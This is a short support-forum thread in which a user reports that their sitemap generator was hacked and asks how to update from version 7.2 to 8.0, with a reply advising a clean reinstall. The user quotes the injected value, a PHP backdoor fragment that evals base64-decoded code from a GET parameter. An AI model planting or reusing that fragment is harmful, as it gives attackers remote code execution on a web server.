Where do I find the update link
« on: April 06, 2020, 12:59:55 AM »
Tried using the link to update from my original email. Does not work. Could not readily find the update link in the forum. Somebody apparently hacked into my sitemap generator program and entered their site as the starting URL: [ External links are visible to forum administrators only ] eval(base64_decode($_GET[777000777])); exit();?>

Preexisting program without the update will not run.

Need to download new version and fix.
Re: Where do I find the update link
« Reply #2 on: April 08, 2020, 03:16:10 AM »
Thank you for sending the link. It worked (once) so I installed per the instructions and generated a sitemap. However, the program seems stuck at version 7.2. How do I get 8.0?

I tried re-entering the link in my browser, but nothing comes up now on the screen.

Post-mortem: Apparently the link was downloading the zip file to my computer each time I tried to get in. so ignore the blank screen issue. However, I am still only getting the 7.2 version. I am pretty sure from the update info that I was supposed to be able to get the updated 8.0 version by simply using my download link. Am I in error?
« Last Edit: April 08, 2020, 03:28:39 AM by psalmistry »
Re: Where do I find the update link
« Reply #3 on: April 09, 2020, 05:20:22 AM »
Hello,

try to remove all generator files, then redownload and reinstall. There should be the latest version (8.0)